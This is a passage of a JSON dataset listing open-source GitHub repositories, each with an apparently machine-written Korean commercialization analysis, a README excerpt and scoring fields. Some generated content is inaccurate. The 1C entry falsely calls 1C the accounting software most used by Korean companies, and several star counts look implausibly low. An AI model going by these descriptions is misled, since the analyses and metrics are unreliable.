OS](https://www.redox-os.org).\n- [The Redox Book](https://doc.redox-os.org/book/) and [Build Instructions](https://doc.redox-os.org/book/podman-build.html).\n- [Redox Chat and Support](https://matrix.to/#/#redox-join:matrix.org).\n- [Patreon](https://www.patreon.com/redox_os), [Donate](https://redox-os.org/donate/) and [Merch](https://redox-os.creator-spring.com/).\n- Scroll down for a list of key Redox components and their repositories.\n\n[Redox](https://www.redox-os.org) is an open-source operating system written in Rust, a language with focus on safety, efficiency and high performance. Redox uses a microkernel architecture, and aims to be reliable, secure, usable, correct, a","composite_score":0.0403,"license_safety_tag":"safe"},{"name":"bluelinelabs/Conductor","github_url":"https://github.com/bluelinelabs/Conductor","stars":8,"language":"Java","license":"apache-2.0","abandonment_months":2,"description":"# Conductor 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱에서 화면 전환과 데이터 흐름을 깔끔하게 관리해주는 도구로, 복잡한 앱 구조를 단순하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 모바일 앱이 필요한 관리 도구나 협업 서비스의 핵심 기술로 판매\n2. **내부 업무 도구**: 기업의 모바일 앱 개발 팀이 개발 속도","readme_excerpt":"[![GitHub Actions Workflow](https://github.com/bluelinelabs/conductor/actions/workflows/main.yml/badge.svg)](https://github.com/bluelinelabs/conductor/actions/workflows/main.yml) [![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-Conductor-brightgreen.svg?style=flat)](http://android-arsenal.com/details/1/3361) [![Javadocs](http://javadoc.io/badge/com.bluelinelabs/conductor.svg)](http://javadoc.io/doc/com.bluelinelabs/conductor)\n\n# Conductor\n\nA small, yet full-featured framework that allows building View-based Android applications. Conductor provides a light-weight wrapper around standard Android Views that does just about everything you'd want:\n\n|           |  Conductor  |\n|-----------|-------------|\n:tada: | Easy integration\n:point_up: | Single Activity apps without using Fragments\n:recycle: | Simple but powerful lifecycle management\n:train: | Navigation and backstack handling\n:twisted_rightwards_arrows: | Beautiful transitions between views\n:floppy_disk: | State persi","composite_score":0.0403,"license_safety_tag":"safe"},{"name":"VonHeikemen/fine-cmdline.nvim","github_url":"https://github.com/VonHeikemen/fine-cmdline.nvim","stars":7,"language":"Lua","license":"MIT","abandonment_months":2,"description":"# fine-cmdline.nvim 분석 보고서\n\n## 왜 보물인가\n텍스트 편집기(Neovim) 사용자들이 명령어를 더 쉽고 빠르게 입력할 수 있도록 만드는 소프트웨어입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 생산성 도구 SaaS**: 프로그래머 전용 IDE(통합개발환경) 플러그인 마켓플레이스에서 유료 판매\n2. **기업 내부 개발 환경**: 소프","readme_excerpt":"# The Fine Command Line\n\nHere is the plan: A floating input shows up, you a enter a command and you're done. You can use `<Tab>` completion like the regular `cmdline`, and can also navigate the command history with `<Up>` and `<Down>` arrows. That's it.\n\nMy hope is that someone else with more knowledge sees this and inspires them to make a [Telescope](https://github.com/nvim-telescope/telescope.nvim) plugin with the same features.\n\n![A floating input with the text 'Telescope co'.](https://res.cloudinary.com/vonheikemen/image/upload/v1637341165/other/Captura_de_pantalla_de_2021-11-19_12-54-42.png)\n\n> This plugin does not have access to `commandline-mode`, cool features like live previews don't work here.\n>\n> If you want a UI to execute buffer local search (like with `/`) use [searchbox.nvim](https://github.com/VonHeikemen/searchbox.nvim).\n\n## Getting Started\n\nMake sure you have [Neovim v0.5.1](https://github.com/neovim/neovim/releases/tag/v0.5.1) or greater.\n\n### Dependencies\n\n- [nui.nv","composite_score":0.0402,"license_safety_tag":"safe"},{"name":"airblade/vim-gitgutter","github_url":"https://github.com/airblade/vim-gitgutter","stars":6,"language":"Vim Script","license":"mit","abandonment_months":2,"description":"# airblade/vim-gitgutter 상품화 분석\n\n## 왜 보물인가\n프로그래머들이 코드 변경 내용을 즉시 시각적으로 확인할 수 있게 해주는 필수 개발 도구입니다.\n\n## 어디에 쓸 수 있나\n- **개발자 IDE 플러그인 SaaS**: 코드 편집기에 내장되어 구독료를 받으며 제공\n- **기업 소프트웨어 개발 플랫폼**: 대기업의 내부 코딩 시스템에 ","readme_excerpt":"## vim-gitgutter\n\nA Vim plugin which shows a git diff in the sign column.  It shows which lines have been added, modified, or removed.  You can also preview, stage, and undo individual hunks; and stage partial hunks.  The plugin also provides a hunk text object.\n\nThe signs are always up to date and the plugin never saves your buffer.\n\nThe name \"gitgutter\" comes from the Sublime Text 3 plugin which inspired this in 2013.\n\nFeatures:\n\n* Shows signs for added, modified, and removed lines.\n* Runs the diffs asynchronously where possible.\n* Ensures signs are always up to date.\n* Never saves the buffer.\n* Quick jumping between blocks of changed lines (\"hunks\").\n* Stage/undo/preview individual hunks.\n* Previews highlight intra-line changes.\n* Stage partial hunks.\n* Provides a hunk text object.\n* Diffs against index (default) or any commit.\n* Handles file moves / renames.\n* Heeds git's \"assume unchanged\" bit.\n* Allows folding all unchanged text.\n* Provides fold text showing whether folded lines ","composite_score":0.04,"license_safety_tag":"safe"},{"name":"ggerganov/ggwave","github_url":"https://github.com/ggerganov/ggwave","stars":14,"language":"C++","license":"MIT","abandonment_months":1,"description":"# ggwave 저장소 분석\n\n## 왜 보물인가\n소리 파동을 이용해 기기 간에 데이터를 무선으로 전송하는 기술로, QR코드나 블루투스 없이도 음성 신호만으로 정보 교환이 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 콘서트나 이벤트 현장에서 스피커 음파를 통해 관객의 스마트폰에 티켓 정보나 이벤트 쿠폰 자동 전송\n2. **내부 업무 ","readme_excerpt":"# ggwave\n\n[![Actions Status](https://github.com/ggerganov/ggwave/workflows/CI/badge.svg)](https://github.com/ggerganov/ggwave/actions)\n[![License: MIT](https://img.shields.io/badge/license-MIT-blue.svg)](https://opensource.org/licenses/MIT)\n[![ggwave badge][changelog-badge]][changelog]\n[![pypi](https://img.shields.io/pypi/v/ggwave.svg)](https://pypi.org/project/ggwave/)\n[![npm](https://img.shields.io/npm/v/ggwave.svg)](https://www.npmjs.com/package/ggwave/)\n\nTiny data-over-sound library.\n\nClick on the images below to hear what it sounds like:\n\n<a href=\"https://youtu.be/S2YdGefZiy4\"><img width=\"100%\" src=\"media/ggwave0.gif\"></img></a>\n\n<a href=\"https://user-images.githubusercontent.com/1991296/161401690-013023ba-1d21-4fb7-8d7f-9953f51c1e5b.mp4\"><img width=\"100%\" src=\"https://user-images.githubusercontent.com/1991296/109401710-d7d3d880-7958-11eb-9b7e-364be0b4cf55.gif\"></img></a>\n\n<a href=\"https://youtu.be/Zcgf77T71QM\"><img width=\"100%\" src=\"media/waver-preview1.gif\"></img></a>\n\nhttps://u","composite_score":0.0399,"license_safety_tag":"safe"},{"name":"rothgar/awesome-tuis","github_url":"https://github.com/rothgar/awesome-tuis","stars":6,"language":"","license":"unknown","abandonment_months":1,"description":"# rothgar/awesome-tuis 평가\n\n## 왜 보물인가\n터미널에서 사용하는 다양한 유용한 프로그램들을 한눈에 찾아볼 수 있는 종합 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 커뮤니티 플랫폼**: 개발자들이 터미널 도구를 추천받고 공유하는 유료 구독 커뮤니티\n2. **회사 내부 도구 교육**: IT팀이 신입 개발자에게 필수 터미널 도","readme_excerpt":"<h1 align=\"center\">\n  <code>Awesome TUIs</code>\n</h1>\n\nThis is a community maintained list of TUI applications. A TUI application runs in your terminal and has some level of interactivity. Commands included in this list should not wrap other interactive commands (e.g. `fzf`), and should be maintained.\n\nI made a video of my favorite TUIs from this list (one from each section). Click the image to check it out. 👇\n\n[![](https://i.ytimg.com/vi/_fLmA4fjiAE/maxresdefault.jpg)](https://youtu.be/_fLmA4fjiAE?si=IgXuo)\n\nThere's a lot of cool projects here that I have no association with. Run them at your own risk. If you have a cool tool you'd like to share please [open a PR](https://github.com/rothgar/awesome-tuis/pulls).\n\n## Table of Contents\n\n- [Dashboards](#dashboards)\n- [Development](#development)\n- [Docker/LXC/K8s](#dockerlxck8s)\n- [Editors](#editors)\n- [File Managers](#file-managers)\n- [Games](#games)\n- [Libraries](#libraries)\n- [Messaging](#messaging)\n- [Miscellaneous](#miscellaneous)\n- [","composite_score":0.0399,"license_safety_tag":"unknown"},{"name":"JasonStein/Notepads","github_url":"https://github.com/JasonStein/Notepads","stars":5,"language":"C#","license":"MIT","abandonment_months":1,"description":"# Notepads 저장소 분석\n\n## 왜 보물인가\n간단하고 빠른 메모장 프로그램으로, 복잡한 설정 없이 누구나 쉽게 글을 작성하고 저장할 수 있는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 구독 기반의 클라우드 메모 앱으로 모든 기기에서 동기화되는 온라인 노트 서비스\n- **내부 업무 도구**: 기업 직원들이 회의록, 업","readme_excerpt":"<p align=\"center\">\n  <img width=\"128\" align=\"center\" src=\"src/Notepads/Assets/appicon_ws.gif\">\n</p>\n<h1 align=\"center\">\n  Notepads\n</h1>\n<p align=\"center\">\n  A modern, lightweight text editor with a minimalist design.\n</p>\n<p align=\"center\">\n  <a style=\"text-decoration:none\" href=\"https://www.microsoft.com/store/apps/9nhl4nsc67wm\">\n    <img src=\"https://img.shields.io/badge/Microsoft%20Store-Download-orange.svg?style=flat-square\" alt=\"Store link\" />\n  </a>\n  <a style=\"text-decoration:none\" href=\"https://github.com/0x7c13/Notepads/releases\">\n    <img src=\"https://img.shields.io/github/release/0x7c13/notepads.svg?label=latest%20version&style=flat-square\" alt=\"Releases\" />\n  </a>\n  <a style=\"text-decoration:none\">\n    <img src=\"https://img.shields.io/badge/platform-Windows%20%7C%20UWP-yellow.svg?style=flat-square\" alt=\"Platform\" />\n  </a>\n  <a style=\"text-decoration:none\" href=\"https://discord.gg/VqetCub\">\n    <img src=\"https://img.shields.io/discord/588473626651787274.svg?style=flat-squa","composite_score":0.0397,"license_safety_tag":"safe"},{"name":"antfu/unocss","github_url":"https://github.com/antfu/unocss","stars":20,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"# UnoCSS 저장소 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 디자인 작업을 자동으로 해주는 도구로, 개발자의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹 개발 에이전시의 SaaS 서비스**\n- 클라이언트가 직접 웹사이트 디자인을 빠르게 수정할 수 있는 플랫폼으로 제공\n- 월 구독료를 받으며 지속적인 수익 창","readme_excerpt":"<br>\n\n<p align=\"center\">\n<img src=\"https://raw.githubusercontent.com/unocss/unocss/main/playground/public/icon-gray.svg\" style=\"width:100px;\" alt=\"UnoCSS Logo\" />\n</p>\n\n<h1 align=\"center\">UnoCSS</h1>\n\n<p align=\"center\">\nThe instant on-demand Atomic CSS engine.\n</p>\n\n<p align=\"center\">\n<a href=\"https://www.npmjs.com/package/unocss\"><img src=\"https://img.shields.io/npm/v/unocss?color=c95f8b&amp;label=\" alt=\"NPM version\"></a></p>\n\n<blockquote align=\"center\">\n<p>💡 I highly recommend reading this blog post - <br><a href=\"https://antfu.me/posts/reimagine-atomic-css\"><strong>Reimagine Atomic CSS</strong></a><br>for the story behind</p>\n</blockquote>\n\n<br>\n<p align=\"center\">\n<a href=\"https://unocss.dev/\">📚 Documentation</a> |\n<a href=\"https://unocss.dev/interactive/\">🧑‍💻 Interactive Docs</a> |\n<a href=\"https://unocss.dev/play/\">🤹‍♂️ Playground</a> |\n<a href=\"https://tutorial.unocss.dev/\">🎓 Tutorial</a>\n</p>\n<br>\n\n## Features\n\nInspired by [Windi CSS](http://windicss.org/), [Tailwind CSS](https:","composite_score":0.0397,"license_safety_tag":"unknown"},{"name":"translate-tools/linguist","github_url":"https://github.com/translate-tools/linguist","stars":5,"language":"TypeScript","license":"BSD-3-Clause","abandonment_months":2,"description":"# translate-tools/linguist 상용화 분석\n\n## 왜 보물인가\n다국어 번역이 필요한 웹사이트나 앱을 자동으로 감지하고 번역할 수 있는 도구로, 글로벌 서비스 확대를 원하는 회사들의 비용과 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹사이트 자동 번역 플랫폼 (Wix, Shopify 같은 사이트","readme_excerpt":"Linguist is a powerful browser extension that is ready to replace your favorite translation service.\n\nTranslate web pages, highlighted text, Netflix subtitles, private messages, speak the translated text, and save important translations to your personal dictionary to learn words in 130 languages.\n\n# Why Linguist?\n\nUnlike other browser extensions, Linguist is not just a wrapper over the Google Translator Widget; it's a full-featured and independent translation system. This is why with Linguist you can be private and translate texts offline on your device and use any translation service, [even your own](./docs/CustomTranslator.md) like ChatGPT. See a [custom translators list](https://github.com/translate-tools/linguist-translators) to find bindings for the most popular translation services.\n\nLinguist is free, open-source, respects your privacy, and does not collect your personal data.\n\n# Features\n\nMost important features\n- Modular translators system\n\t- You can use any translation service","composite_score":0.0396,"license_safety_tag":"safe"},{"name":"airbnb/Showkase","github_url":"https://github.com/airbnb/Showkase","stars":6,"language":"Kotlin","license":"Apache-2.0","abandonment_months":2,"description":"# Airbnb Showkase 상업화 분석\n\n## 왜 보물인가\n에어비앤비가 만든 디자인 시스템으로, 기업의 디자인과 개발을 한곳에서 관리할 수 있어 제품 만드는 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 디자인 협업 SaaS 서비스**\n- 여러 회사의 디자이너와 개발자가 함께 디자인을 관리하고 공유하는 구독형 웹 서비스로 제공","readme_excerpt":"# Showkase\n![Showkase Version](https://img.shields.io/badge/Showkase-1.0.5-brightgreen) ![Compatible with Compose](https://img.shields.io/badge/Compatible%20with%20Compose-1.6.7-brightgreen)\n\nShowkase is an annotation-processor based Android library that helps you organize, discover, search \nand visualize [Jetpack Compose](https://developer.android.com/jetpack/compose) UI elements. With \nminimal configuration it generates a UI browser that helps you easily find your components, \ncolors & typography. It also renders your components in common situations like dark mode, \nright-to-left layouts, and scaled fonts which help in finding issues early.\n\n\n<p align=\"center\">\n    <img src=\"assets/showkase_features.png\">\n</p>\n\n<p align=\"center\">\n    <img src=\"assets/showkase_permutations.png\">\n</p>\n\n<p align=\"center\">\n    <img src=\"assets/showkase_design_system.png\">\n</p>\n\n<table align=\"center\" style=\"width:100%\">\n    <tr>\n        <td><img height=\"400\" src=\"assets/showkase_demo.gif\"></td>\n        <t","composite_score":0.0391,"license_safety_tag":"safe"},{"name":"ropensci/plotly","github_url":"https://github.com/ropensci/plotly","stars":7,"language":"R","license":"NOASSERTION","abandonment_months":1,"description":"# ropensci/plotly 분석 보고서\n\n## 왜 보물인가\n복잡한 데이터를 누구나 이해할 수 있는 아름다운 그래프와 차트로 변환해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 SaaS**: 기업의 판매 현황, 고객 통계를 실시간 대시보드로 보여주는 서비스\n2. **내부 업무 도구**: 마케팅팀이 광고 성과를 한눈에 보는 리포팅 시스","readme_excerpt":"\n<!-- README.md is generated from README.Rmd. Please edit that file -->\n\n<img src=\"man/figures/plotly.png\" width=\"200\" />\n\n<!-- badges: start -->\n[![R-CMD-check](https://github.com/ropensci/plotly/workflows/R-CMD-check/badge.svg)](https://github.com/plotly/plotly.R/actions)\n[![CRAN Status](https://www.r-pkg.org/badges/version/plotly)](https://cran.r-project.org/package=plotly)\n[![CRAN Downloads](https://cranlogs.r-pkg.org/badges/grand-total/plotly)](https://cranlogs.r-pkg.org/badges/grand-total/plotly)\n[![monthly](https://cranlogs.r-pkg.org/badges/plotly)](https://cranlogs.r-pkg.org/badges/plotly)\n<!-- badges: end -->\n\nAn R package for creating interactive web graphics via the open source\nJavaScript graphing library\n[plotly.js](https://github.com/plotly/plotly.js).\n\n<div align=\"center\">\n  <a href=\"https://dash.plotly.com/project-maintenance\">\n    <img src=\"https://dash.plotly.com/assets/images/maintained-by-community.png\" width=\"400px\" alt=\"Maintained by the Plotly Community\">\n  </a>\n<","composite_score":0.039,"license_safety_tag":"unknown"},{"name":"a597873885/webfunny_monitor","github_url":"https://github.com/a597873885/webfunny_monitor","stars":9,"language":"JavaScript","license":"Apache-2.0","abandonment_months":0,"description":"# webfunny_monitor 상용화 분석\n\n## 왜 보물인가\n웹사이트 방문자들의 행동을 자동으로 기록하고 분석해서 서비스 개선에 필요한 정보를 한눈에 볼 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 쇼핑몰, 예약 시스템, 뉴스 플랫폼 등이 고객 이탈 지점을 파악하고 개선하기 위해 구독\n- **내부 업무 도구**:","readme_excerpt":"<p align=\"center\">\n  <img width=\"360\" src=\"https://www.webfunny.cn/resource/logo-letter.png\"/>\n</p>\n\n<h3 align=\"center\">前端监控 & Apm后端监控 & 埋点系统</h3>\n<p align=\"center\">Webfunny是一款集全链路监控和埋点系统于一体的大数据分析系统，我们致力于解决线上的疑难杂症和精细化分析业务数据；监控系统面向技术、埋点系统面向业务，两者配合使用，相得益彰。\n</p>\n\n<p align=\"center\">\n  <a href=\"https://github.com/a597873885/webfunny_monitor\"><img alt=\"GitHub Repo stars\" src=\"https://img.shields.io/github/stars/a597873885/webfunny_monitor?style=social\"></a>\n  <a href=\"https://github.com/a597873885/webfunny_monitor\"><img alt=\"GitHub repo size\" src=\"https://img.shields.io/github/repo-size/a597873885/webfunny_monitor\"></a>\n  <a href=\"https://github.com/a597873885/webfunny_monitor/commits\"><img alt=\"GitHub last commit\" src=\"https://img.shields.io/github/last-commit/a597873885/webfunny_monitor\"></a>\n  <a href=\"https://github.com/a597873885/webfunny_monitor/issues\"><img alt=\"GitHub issues\" src=\"https://img.shields.io/github/issues-raw/a597873885/webfunny_monitor\"></a>\n  <a href=\"https://github.com","composite_score":0.0388,"license_safety_tag":"safe"},{"name":"aws-ia/terraform-aws-control_tower_account_factory","github_url":"https://github.com/aws-ia/terraform-aws-control_tower_account_factory","stars":12,"language":"HCL","license":"Apache-2.0","abandonment_months":1,"description":"# AWS Control Tower Account Factory 분석\n\n## 왜 보물인가\n대기업의 클라우드 계정을 자동으로 만들고 관리해주는 도구로, 복잡한 설정 작업을 수십 시간에서 수십 분으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 멀티테넌트 클라우드 플랫폼에서 고객별 독립적인 클라우드 계정을 자동 생성해주는 관","readme_excerpt":"# AWS Control Tower Account Factory for Terraform\nAWS Control Tower Account Factory for Terraform (AFT) follows a GitOps model to automate the processes of account provisioning and account updating in AWS Control Tower. You'll create an *account request* Terraform file, which provides the necessary input that triggers the AFT workflow for account provisioning.\n\n\nFor more information on AFT, see [Overview of AWS Control Tower Account Factory for Terraform](https://docs.aws.amazon.com/controltower/latest/userguide/aft-overview.html)\n\n## Getting started\n\nThis guide is intended for administrators of AWS Control Tower environments who wish to set up Account Factory for Terraform (AFT) in their environment. It describes how to set up an Account Factory for Terraform (AFT) environment with a new, dedicated AFT management account. This guide follows the deployment steps outlined in [Deploy AWS Control Tower Account Factory for Terraform (AFT)](https://docs.aws.amazon.com/controltower/latest/us","composite_score":0.0388,"license_safety_tag":"safe"},{"name":"magicblack/maccms10","github_url":"https://github.com/magicblack/maccms10","stars":5,"language":"PHP","license":"NOASSERTION","abandonment_months":0,"description":"# magicblack/maccms10 평가 리포트\n\n## 왜 보물인가\n웹사이트에서 영화, 드라마, 예능 등의 영상 콘텐츠를 쉽게 관리하고 보여줄 수 있는 준비된 시스템입니다.\n\n## 어디에 쓸 수 있나\n\n1. **영상 스트리밍 SaaS 서비스**: 개인 창작자나 소규모 방송사가 월 구독으로 자신의 영상 라이브러리를 관리하고 시청자에게 제공\n2. **온라인","readme_excerpt":"## 苹果cms-v10\n\n苹果CMS程序是一套采用PHP+MYSQL环境下运行的完善而强大的快速建站系统。经过近多年的开发经验和技术积累，苹果CMS程序已逐步走向成熟，在易用性和功能上已经成为同行中的佼佼者。程序体积小->优化程序代码，运行速度快->高效的缓存处理，只要普通的虚拟主机就可以完美搭建起来，建站成本非常低。仿MVC模板分离，内置标签，自定义函数标签接口，强大的自定义采集功能，只要你会HTML就可以轻松做出个性化的网站。 程序易用性和功能上一直以来都积极采纳广大站长提出的各种好的建议，迅速响应各种紧急问题，我们的服务理念贯穿其中，保证每一位站长每一个环节都可以从容应对。v10采用tp5.x内核进行开发，扩展了模板处理引擎，将后台程序与html模板简单的分离出来，让设计人员与程序人员最大限度的发挥自己的优势而互不干扰，大大加快了项目有序、快速的完成。即使您是第一次接触，也会在最短的时间内熟练掌握它的使用方法。后台管理模块，一目了然，操作简单，绝对不会让您眼花缭乱。\n\n蘋果CMS程式是一套採用PHP+MYSQL環境下執行的完善而強大的快速建站系統。經過多年的開發經驗和技術累積，蘋果CMS程式已逐步走向成熟，在易用性和功能上已經成為同行中的佼佼者。程式體積小->最佳化程式碼，執行速度快->高效的快取處理，只要普通的虛擬主機就可以完美搭建起來，建站成本非常低。仿MVC模板分離，內建標籤，自訂函式標籤介面，強大的自訂採集功能，只要你會HTML就可以輕鬆做出個性化的網站。程式易用性和功能上一直以來都積極採納廣大站長提出的各種好的建議，迅速回應各種緊急問題，我們的服務理念貫穿其中，保證每一位站長每一個環節都可以從容應對。v10採用tp5.x核心進行開發，擴充了模板處理引擎，將後台程式與html模板簡單地分離出來，讓設計人員與程式人員最大限度地發揮自己的優勢而互不干擾，大大加快了專案有序、快速的完成。即使您是第一次接觸，也會在最短的時間內熟練掌握它的使用方法。後台管理模組，一目了然，操作簡單，絕對不會讓您眼花撩亂。\n\nApple CMS program is a set of PHP and MYSQL environment operating in a perfect and powerful fast station system. After nearly ye","composite_score":0.0388,"license_safety_tag":"unknown"},{"name":"cipher387/osint_stuff_tool_collection","github_url":"https://github.com/cipher387/osint_stuff_tool_collection","stars":10,"language":"HTML","license":"unknown","abandonment_months":0,"description":"# cipher387/osint_stuff_tool_collection 분석\n\n## 왜 보물인가\n인터넷에 공개된 정보를 수집·분석하는 도구 모음으로, 기업 보안 위험 요소를 조사하거나 마케팅 대상자 조사에 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **기업 보안 진단 SaaS**: 회사의 온라인 정보 노출 현황을 자동으로 점검해주는 월간 구독","readme_excerpt":"\n<div align=\"center\">\n     <h1>Cyber Detective's OSINT tools collection</h1>\n     <img alt=\"GitHub stars\" src=\"https://img.shields.io/github/stars/cipher387/osint_stuff_tool_collection\"> \n     <img alt=\"GitHub forks\" src=\"https://img.shields.io/github/forks/cipher387/osint_stuff_tool_collection\"> <br>\n     <br>\n     <br>\n</div>\n\n\nHello! On my Twitter account [@cyb_detective](https://linktr.ee/cyb_detective) I post different services, techniques, tricks and notes about OSINT and more. I collect all the links from my tweets in this collection (already 1000+ services for a wide variety of purposes).\n\n\nThank you for following me! [@cyb_detective](https://cybdetective.com)\n\n\n\nDon't forget that OSINT's main strength is in automation. Read the [Netlas Cookbook](https://github.com/netlas-io/netlas-cookbook) for details and examples.\n\n<i>I have been working on this repository since the summer of 2021. Many tools are constantly becoming obsolete, no longer supported or working at all. But I don'","composite_score":0.0387,"license_safety_tag":"unknown"},{"name":"Gnucash/gnucash","github_url":"https://github.com/Gnucash/gnucash","stars":6,"language":"C","license":"NOASSERTION","abandonment_months":0,"description":"# GnuCash 저장소 분석\n\n## 왜 보물인가\n무료 가정용 회계 관리 프로그램으로, 개인의 월급·지출·저축을 체계적으로 기록하고 분석할 수 있는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개인 재무 관리 SaaS**: 월급 추적, 가계부, 자산 관리를 클라우드에서 하는 구독형 서비스\n2. **소상공인 회계 도구**: 소규모 상점이나 프리","readme_excerpt":"############################################################\n          GnuCash README file.\n\nThe current stable series is GnuCash 5.x.\n------------------------------------------------------------\n\n##################\nTable of Contents:\n------------------\n\n  - Overview\n  - Dependencies\n  - Invocation/running\n  - Internationalization\n  - Building & Installing\n  - Supported Platforms\n  - Additional Download Sites\n  - Getting the Source via Git\n  - Developing GnuCash\n\n########\nOverview\n--------\n\nGnuCash is a personal and small business double entry accounting application.\n\nHome Page:\nhttps://www.gnucash.org/\n\nWiki:\nhttps://wiki.gnucash.org/wiki/GnuCash\n\nPrecompiled binaries:\nhttps://www.gnucash.org/download\n\n############\nDependencies\n------------\n\nPlease see README.dependencies for current build dependencies.\n\nThe optional online stock and currency price retrieval feature requires Perl.\nThis is generally already installed on Gnu/Linux and *BSD, and MacOS.\n\nIn addition, some perl modules nee","composite_score":0.0387,"license_safety_tag":"unknown"},{"name":"nvim-lua/plenary.nvim","github_url":"https://github.com/nvim-lua/plenary.nvim","stars":6,"language":"Lua","license":"MIT","abandonment_months":2,"description":"# nvim-lua/plenary.nvim 분석\n\n## 왜 보물인가\n프로그래밍 에디터를 확장하는 기본 도구 모음으로, 수천 명의 개발자가 이를 기반으로 새로운 기능을 만들고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 도구 SaaS**: 프로그래밍 에디터 플러그인 마켓플레이스 운영 (개발자들이 구매하는 확장 기능들의 기반)\n2. **기업용 개발 환","readme_excerpt":"# plenary.nvim\n\n---\n\n## Important Notice\n\nThis repository is no longer actively maintained and will be officially archived soon.\n\n* Critical bugs may still be addressed until **2026-06-30**\n* No new features will be added\n* Ongoing support should not be expected\n\n---\n\nAll the lua functions I don't want to write twice.\n\n> plenary:\n>\n>     full; complete; entire; absolute; unqualified.\n\nNote that this library is useless outside of Neovim since it requires Neovim functions. It should be usable with any recent version of Neovim though.\n\n~~At the moment, it is very much in pre-alpha :smile: Expect changes to the way some functions are structured. I'm hoping to finish some document generators to provide better documentation for people to use and consume and then at some point we'll stabilize on a few more stable APIs.~~\n\n## Installation\n\n[![LuaRocks](https://img.shields.io/luarocks/v/Conni2461/plenary.nvim?logo=lua&color=purple)](https://luarocks.org/modules/Conni2461/plenary.nvim)\n\nUsing [p","composite_score":0.0387,"license_safety_tag":"safe"},{"name":"CuyZ/Valinor","github_url":"https://github.com/CuyZ/Valinor","stars":39,"language":"PHP","license":"MIT","abandonment_months":2,"description":"# Valinor 저장소 분석\n\n## 왜 보물인가\n프로그래밍 언어에서 데이터 형태를 자동으로 검증하고 변환해주는 도구로, 개발자들의 반복적인 검증 작업을 획기적으로 줄여줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **API 판매**: 고객사의 데이터를 받을 때 자동으로 올바른 형식인지 확인하는 검증 서비스로 제공\n2. **SaaS 서비스**: 사용자가","readme_excerpt":"<div align=\"center\">\n\n![Valinor banner](docs/pages/img/valinor-banner.svg)\n\n<div>— From boring old arrays to shiny typed objects —</div>\n\n<br>\n\n[![Latest Stable Version](https://poser.pugx.org/cuyz/valinor/v)][link-packagist]\n[![PHP Version Require](https://poser.pugx.org/cuyz/valinor/require/php)][link-packagist]\n[![Total Downloads](https://poser.pugx.org/cuyz/valinor/downloads)][link-packagist]\n[![Mutation testing badge](https://img.shields.io/endpoint?style=flat&url=https%3A%2F%2Fbadge-api.stryker-mutator.io%2Fgithub.com%2FCuyZ%2FValinor%2Fmaster)](https://dashboard.stryker-mutator.io/reports/github.com/CuyZ/Valinor/master)\n\n</div>\n\n---\n\nValinor takes care of the construction and validation of raw inputs (JSON, plain\narrays, etc.) into objects, ensuring a perfectly valid state. It allows the\nobjects to be used without having to worry about their integrity during the\nwhole application lifecycle.\n\nThe validation system will detect any incorrect value and help the developers by\nprovidi","composite_score":0.0386,"license_safety_tag":"safe"},{"name":"jruby/jruby","github_url":"https://github.com/jruby/jruby","stars":8,"language":"Ruby","license":"NOASSERTION","abandonment_months":0,"description":"# JRuby 저장소 분석\n\n## 왜 보물인가\nJava와 Ruby라는 두 프로그래밍 언어를 함께 사용할 수 있게 해주는 기술로, 기존 Java 시스템에 Ruby의 유연함을 더할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 자동화 워크플로우 플랫폼 - 복잡한 Java 백엔드에 간단한 Ruby 스크립트를 추가하여 사용자가 쉽게 커스터","readme_excerpt":"# JRuby - an implementation of the Ruby language on the JVM\n\nMaster: [![JRuby CI](https://github.com/jruby/jruby/actions/workflows/ci.yml/badge.svg)](https://github.com/jruby/jruby/actions/workflows/ci.yml), [![JRuby CI (Windows)](https://github.com/jruby/jruby/actions/workflows/ci-windows.yml/badge.svg)](https://github.com/jruby/jruby/actions/workflows/ci-windows.yml)\n9.3 branch: [![JRuby CI](https://github.com/jruby/jruby/actions/workflows/ci.yml/badge.svg?branch=jruby-9.3)](https://github.com/jruby/jruby/actions/workflows/ci.yml), [![JRuby CI (Windows)](https://github.com/jruby/jruby/actions/workflows/ci-windows.yml/badge.svg?branch=jruby-9.3)](https://github.com/jruby/jruby/actions/workflows/ci-windows.yml)\n\n## About\n\nJRuby is an implementation of the [Ruby language](http://www.ruby-lang.org)\nusing the JVM.\n\nIt aims to be a complete, correct and fast implementation of Ruby, at the same\ntime as providing powerful new features such as concurrency without a\n[global-interpreter-lock](h","composite_score":0.0385,"license_safety_tag":"unknown"},{"name":"Oxotka/StackTechnologies1C","github_url":"https://github.com/Oxotka/StackTechnologies1C","stars":5,"language":"","license":"MIT","abandonment_months":2,"description":"# StackTechnologies1C 저장소 분석\n\n## 왜 보물인가\n한국 기업들이 가장 많이 사용하는 회계·관리 소프트웨어인 1C를 연동하는 기술 솔루션이라, 이미 구축된 고객 기반의 문제를 빠르게 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업을 위한 자동 회계 연동 플랫폼 (1C 데이터를 클라우드에서 실시간 처","readme_excerpt":"[![OpenYellow](https://img.shields.io/endpoint?url=https://openyellow.org/data/badges/2/429536375.json)](https://openyellow.org/grid?data=top&repo=429536375) [![Static Badge](https://img.shields.io/badge/my%20telegram-channel-blue)](https://t.me/AriN1C) [![Static 